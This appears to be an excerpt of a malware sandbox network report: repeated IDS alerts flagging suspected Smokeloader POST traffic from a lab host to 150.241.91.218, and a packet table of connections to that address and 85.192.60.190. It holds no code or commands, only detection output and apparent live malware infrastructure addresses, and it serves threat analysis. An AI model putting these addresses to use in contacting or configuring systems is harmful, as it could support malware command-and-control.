                                                                                                                                                              2024-11-06T17:40:27.156465+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050331150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:27.634109+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050332150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:28.104334+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050333150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:28.581421+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050334150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:30.041666+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050335150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:30.501968+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050336150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:30.978930+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050337150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:31.441078+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050338150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:31.896578+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050339150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:32.361939+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050340150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:32.820994+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050341150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:33.296801+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050342150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:33.763257+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050343150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:34.250200+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050344150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:34.734576+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050345150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:36.225546+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050346150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:36.698778+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050347150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:37.158063+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050348150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:37.619309+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050349150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:38.077822+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050350150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:38.534588+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050351150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:38.995289+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050352150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:39.457089+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050353150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:39.923186+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050354150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:40.388592+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050355150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:41.852784+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050356150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:42.325801+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050357150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:42.789586+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050358150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:43.254906+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050359150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:43.718250+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050360150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:44.180754+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050361150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:44.645236+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050362150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:45.113017+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050363150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:45.572747+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050364150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:46.023117+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050365150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:46.490245+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050366150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:46.948092+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050367150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:47.411091+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050368150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:47.874198+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050369150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:48.338079+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050370150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:48.816864+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050371150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:49.293844+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050372150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:49.753958+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050373150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:50.984541+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050374150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:51.460117+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050375150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:51.924844+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050376150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:52.385225+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050377150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:52.856217+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050378150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:53.315785+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050379150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:53.780937+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050380150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:55.251482+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050381150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:55.705169+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050382150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:56.174827+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050383150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:56.633367+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050384150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:57.196776+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050385150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:57.658810+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050386150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:58.119897+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050387150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:58.578987+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050388150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:59.340162+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050389150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:40:59.804370+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050390150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:00.274571+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050391150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:00.731668+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050392150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:02.210814+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050393150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:02.671245+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050394150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:03.130205+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050395150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:03.590472+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050396150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:04.046623+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050397150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:04.507837+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050398150.241.91.21880TCP
                                                                                                                                                              2024-11-06T17:41:04.964287+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.11.2050399150.241.91.21880TCP
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Nov 6, 2024 17:34:02.021373987 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.210545063 CET804975085.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.210818052 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.211380005 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.211380005 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.400659084 CET804975085.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.400672913 CET804975085.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.468101978 CET804975085.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.470840931 CET49751443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.470885038 CET4434975185.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.471283913 CET49751443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.471329927 CET49751443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.471343994 CET4434975185.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.514175892 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.662205935 CET4434975185.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.662733078 CET49752443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.662766933 CET4434975285.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.662969112 CET49752443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.663650036 CET49752443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.663670063 CET4434975285.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.853666067 CET4434975285.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.854219913 CET49753443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.854253054 CET4434975385.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.854497910 CET49753443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.854621887 CET49753443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.854662895 CET4434975385.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.854998112 CET49753443192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:34:02.991585016 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.179608107 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.179905891 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.180044889 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.180044889 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.368148088 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.368171930 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466473103 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466816902 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466836929 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466851950 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466944933 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466964006 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466979027 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.466994047 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.467008114 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.467113018 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.467183113 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.467298985 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.655487061 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.655592918 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.655765057 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.662118912 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.662221909 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.662528992 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.675370932 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.675391912 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.675689936 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.688556910 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.688576937 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.688797951 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.701845884 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.701867104 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.702109098 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.715312958 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.715332985 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.715590954 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.728594065 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.728615046 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.728815079 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.741406918 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.741427898 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.741615057 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.754626989 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.754657984 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.754852057 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.767947912 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.768068075 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.768326044 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.843849897 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.843873024 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.845195055 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.850311995 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.850332022 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.850605965 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.863540888 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.863562107 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.864013910 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.876713037 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.876823902 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.877334118 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.889816999 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.889848948 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.890821934 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.903125048 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.903146029 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.903460979 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.916321993 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.916342020 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.916595936 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.929732084 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.929827929 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.930351973 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.942981005 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.943001986 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.943289042 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.956085920 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.956201077 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.956648111 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.968034983 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.968060017 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.969182968 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.979070902 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.979176998 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.979460001 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:03.990473032 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.990493059 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:03.991034031 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.000900030 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.001019001 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.001636028 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.011449099 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.011470079 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.011759996 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.021945953 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.021964073 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.022113085 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.032640934 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.032658100 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.033565998 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.043045044 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.043061972 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.043246984 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.053736925 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.053751945 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.054555893 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.064230919 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.064346075 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.064647913 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.070424080 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.070736885 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.071072102 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.076725960 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.076741934 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.077620983 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.082773924 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.082788944 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.082938910 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.088948965 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.088963985 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.089430094 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.095237970 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.095252037 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.095432043 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.101491928 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.101506948 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.101685047 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.107595921 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.107620001 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.108015060 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.113919020 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.113929033 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.114099026 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.120006084 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.120016098 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.120188951 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.125869989 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.125994921 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.126188993 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.132129908 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.132142067 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.132312059 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.138269901 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.138279915 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.139158964 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.144444942 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.144575119 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.144805908 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.150424004 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.150540113 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.151747942 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.156631947 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.156641960 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.157891035 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.162755013 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.162878036 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.163291931 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.169083118 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.169092894 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.169389009 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.175359011 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.175462961 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.175901890 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.181224108 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.181411028 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:04.181699991 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:04.187292099 CET8049754150.241.91.218192.168.11.20
